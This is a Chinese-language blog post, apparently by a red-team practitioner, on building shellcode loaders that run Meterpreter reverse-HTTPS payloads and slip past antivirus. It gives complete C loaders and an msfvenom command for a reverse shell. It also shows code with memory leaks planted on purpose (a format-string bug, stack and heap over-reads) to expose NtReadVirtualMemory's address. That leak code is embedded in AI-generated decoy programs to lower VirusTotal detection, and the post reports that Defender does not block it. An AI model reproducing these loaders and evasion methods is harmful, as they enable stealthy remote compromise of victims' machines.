前世

Win32 API

Win32 API实现最简单的Shellcode Loader如下,代码中包含注释,可以看到每条语句的含义

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#include <windows.h>
#include <stdio.h>

// msfvenom -p windows/meterpreter/reverse_https lhost=xxx lport=xxx -f c
unsigned char shellcode[] =
"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x89\xe5\x64\x8b\x52"
...
"\x30\x2e\x32\x00\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";

int main()
{
// 分配内存
LPVOID allocatedMemory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (allocatedMemory == NULL) {
printf("[-] VirtualAlloc failed. Error: %d\n", GetLastError());
return -1;
}

// 拷贝内存
CopyMemory(allocatedMemory, shellcode, sizeof(shellcode));

// 修改内存属性
DWORD oldProtect;
if (!VirtualProtect(allocatedMemory, sizeof(shellcode), PAGE_EXECUTE_READWRITE, &oldProtect)) {
printf("[-] VirtualProtect failed. Error: %d\n", GetLastError());
return -1;
}

// 创建线程执行
HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)allocatedMemory, NULL, 0, NULL);
if (hThread == NULL) {
printf("[-] CreateThread failed. Error: %d\n", GetLastError());
return -1;
}

// 等待线程完成
WaitForSingleObject(hThread, INFINITE);
CloseHandle(hThread);

return 0;
}

上述代码编译执行后,Meterpreter可成功收到反连,如下图
image

通过PE-bear查看,可以看到IAT中存在之前用到的几个Win32 API,如下图
image

LoadLibrary、GetProcAddress

然后进化出通过LoadLibrary、GetProcAddress实现的动态API调用,代码中包含注释,可以看到每条语句的含义

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
#include <Windows.h>
#include <stdio.h>

// msfvenom -p windows/meterpreter/reverse_https lhost=xxx lport=xxx -f c
unsigned char buf[] =
"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x89\xe5\x64\x8b\x52"
...
"\x30\x2e\x32\x00\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";

int main()
{
// 载入kernel32.dll
HMODULE hKernel32 = LoadLibraryA("kernel32.dll");
if (!hKernel32) {
printf("LoadLibraryA failed. Error: %d", GetLastError());
return -1;
}

// 声明一个函数指针,指定调用约定、参数、返回值符合VirtualAlloc的原型
LPVOID (WINAPI *pVirtualAlloc)(LPVOID, SIZE_T, DWORD, DWORD) = (LPVOID (WINAPI*)(LPVOID, SIZE_T, DWORD, DWORD))GetProcAddress(hKernel32, "VirtualAlloc");

// 声明一个函数指针,指定调用约定、参数、返回值符合RtlMoveMemory的原型
VOID (WINAPI *pRtlMoveMemory)(VOID UNALIGNED*, const VOID UNALIGNED*, SIZE_T) = (VOID (WINAPI*)(VOID UNALIGNED*, const VOID UNALIGNED*, SIZE_T))GetProcAddress(hKernel32, "RtlMoveMemory");

// 声明一个函数指针,指定调用约定、参数、返回值符合VirtualProtect的原型
BOOL (WINAPI *pVirtualProtect)(LPVOID, SIZE_T, DWORD, PDWORD) = (BOOL (WINAPI*)(LPVOID, SIZE_T, DWORD, PDWORD))GetProcAddress(hKernel32, "VirtualProtect");

// 声明一个函数指针,指定调用约定、参数、返回值符合CreateThread的原型
HANDLE (WINAPI *pCreateThread)(LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD) =
(HANDLE (WINAPI*)(LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD))GetProcAddress(hKernel32, "CreateThread");

// 声明一个函数指针,指定调用约定、参数、返回值符合WaitForSingleObject的原型
DWORD (WINAPI *pWaitForSingleObject)(HANDLE, DWORD) = (DWORD (WINAPI*)(HANDLE, DWORD))GetProcAddress(hKernel32, "WaitForSingleObject");

// 声明一个函数指针,指定调用约定、参数、返回值符合CloseHandle的原型
BOOL (WINAPI *pCloseHandle)(HANDLE) = (BOOL (WINAPI*)(HANDLE))GetProcAddress(hKernel32, "CloseHandle");

// 如果哪一个句柄值为false,表示获取失败,程序退出
if (!pVirtualAlloc || !pRtlMoveMemory || !pVirtualProtect || !pCreateThread || !pWaitForSingleObject || !pCloseHandle) {
printf("GetProcAddress failed. Error: %d", GetLastError);
return -1;
}

// 分配内存
LPVOID allocatedMemory = pVirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

// 拷贝内存
pRtlMoveMemory(allocatedMemory, buf, sizeof(buf));

// 修改内存属性
DWORD oldProtect;
if (!pVirtualProtect(allocatedMemory, sizeof(buf), PAGE_EXECUTE_READWRITE, &oldProtect)) {
printf("VirtualProtect failed. Error: %d", GetLastError);
return -1;
}

// 创建线程执行内存
HANDLE hThread = pCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)allocatedMemory, NULL, 0, NULL);
if (hThread == NULL) {
printf("CreateThread failed. Error: %d", GetLastError);
return -1;
}

// 等待线程完成
pWaitForSingleObject(hThread, INFINITE);
pCloseHandle(hThread);
}

上述代码编译执行后,Meterpreter可成功收到反连,如下图
image

通过PE-bear查看,可以看到IAT中不再有之前的几个Win32 API,仅有LoadLibrary、GetProcAddress,如下图
image

再进化后,当今动态获取函数地址主流的方式是查询PEB和EAT,这样在IAT中连GetModuleHandle、GetProcAddress也不会出现,甚至还可以遍历内存,通过特征匹配定位函数,进而动态获取函数地址,不过今天要分享的是一个好玩的东西,通过故意泄露内存地址,然后通过NtReadVirtualMemory读取内存来获取函数地址

今生

resolve.c

首先我们有这样一个工具resolve.c,传入NtReadVirtualMemory的地址、DLL名称、函数名称后,可以计算出函数地址

代码比较多我就不贴出来了,基本原理是通过Native API解析PE及PEB,进而获取DLL基址和函数地址,展开讲的话内容比较多,由于不是本篇文章的重点,先不去细究

VS2022下编译后,用法如下图

image

接下来的问题是如何获得NtReadVirtualMemory的地址

方式1 直接输出

1
2
3
4
5
6
7
8
9
10
11
12
#include <windows.h>
#include <stdio.h>

int main() {
HMODULE hNtdll = LoadLibraryA("ntdll.dll");

FARPROC pNtReadVirtualMemory = GetProcAddress(hNtdll, "NtReadVirtualMemory");

printf("[+] NtReadVirtualMemory address: \t0x%p\n", pNtReadVirtualMemory);

return 0;
}

编译后执行如下

image

将Leak-1.exe传到VT上,可以看到是11/72的检测率

image

上面的代码太少了,很容易被检测,我们用AI生成一个C++实现的200行的任务管理器,并将上面的代码插入其中,当输入我们自定义的z时,会输出NtReadVirtualMemory的地址

image

将Leak-2.exe传到VT上,可以看到是5/72的检测率,检测率降低了将近一半

image

尝试用AI生成别的程序,包括涉及进程管理的控制台任务管理器、涉及文件操作的控制台学生成绩管理系统、甚至不涉及进程管理和文件操作的数学运算、C语言版本、C++版本、加上元数据,传到VT上后,至少会有2个杀毒引擎检测到,实在无奈

不过,尽管VT上显示Microsoft将其标识为恶意的,但在本地Defender中,并不会查杀

image

方式2 格式化字符串漏洞

下述代码是一个典型的格式化字符串漏洞,使用sprintf将格式化数据写入input时,由于没有指定变量,所以会随机打印栈上的值,其中就包括上面定义的leakme1的值,也就造成了内存地址泄露

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#include <windows.h>
#include <stdio.h>

int main() {
HMODULE hNtdll = LoadLibraryA("ntdll.dll");
FARPROC pNtReadVirtualMemory = GetProcAddress(hNtdll, "NtReadVirtualMemory");

long long leakme1 = (long long) pNtReadVirtualMemory;
char input[100];
sprintf(input, "%p %p %p %p\n");
printf(input);

return 0;
}

如果直接在VS2022中编译,默认会带有各种优化,导致不能触发格式化字符串漏洞,需要使用如下命令编译

1
cl FormatStringLeak.cpp /Od /Zi /RTC1

执行后可以看到,输出的四个地址中,有一个是NtReadVirtualMemory的地址

image

方式3 栈越界读

下述代码原理和上面有点类似,字符数组buffer只有8字节,在栈上越界读,可以读到保存NtReadVirtualMemory地址的变量,之所以选择ptr[23]-ptr[16],是经过测试发现,这几个字节保存的是NtReadVirtualMemory地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#include <windows.h>
#include <stdio.h>

int main() {
HMODULE hNtdll = LoadLibraryA("ntdll.dll");
FARPROC pNtReadVirtualMemory = GetProcAddress(hNtdll, "NtReadVirtualMemory");

char buffer[8] = "leak";
long long leakme1 = (long long) pNtReadVirtualMemory;
unsigned char *ptr = (unsigned char *)buffer;

for (int i = 23; i >= 16; i--) {
printf("%02X", ptr[i]);
}

return 0;
}

使用如下命令编译

1
cl StackOverRead.cpp /Od /Zi /RTC1

执行后可以看到,成功输出的地址

image

方式4 堆越界读

下述代码原理和上面的栈越界读基本一致

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#include <windows.h>
#include <stdio.h>

int main() {
HMODULE hNtdll = LoadLibraryA("ntdll.dll");
FARPROC pNtReadVirtualMemory = GetProcAddress(hNtdll, "NtReadVirtualMemory");

char *buffer = (char *)malloc(32);
strcpy(buffer, "leak");
uintptr_t *leakme1 = (uintptr_t *)(buffer + 16);
*leakme1 = (uintptr_t)pNtReadVirtualMemory;

for (int i = 23; i >= 16; i--) { printf("%02X", (unsigned char)buffer[i]); }

return 0;
}

使用如下命令编译

1
cl HeapOverRead.cpp /Od /Zi /RTC1

编译后执行,可以看到,成功输出了NtReadVirtualMemory的地址

image

上述代码,结合AI生成的代码,执行后如下图

image

在Defender下测试,不会被拦截

image

最后

把输出的函数地址和resolve相结合,可以成功获取到NTAPI的地址

image

如何更好的融入到实战中,还有待探索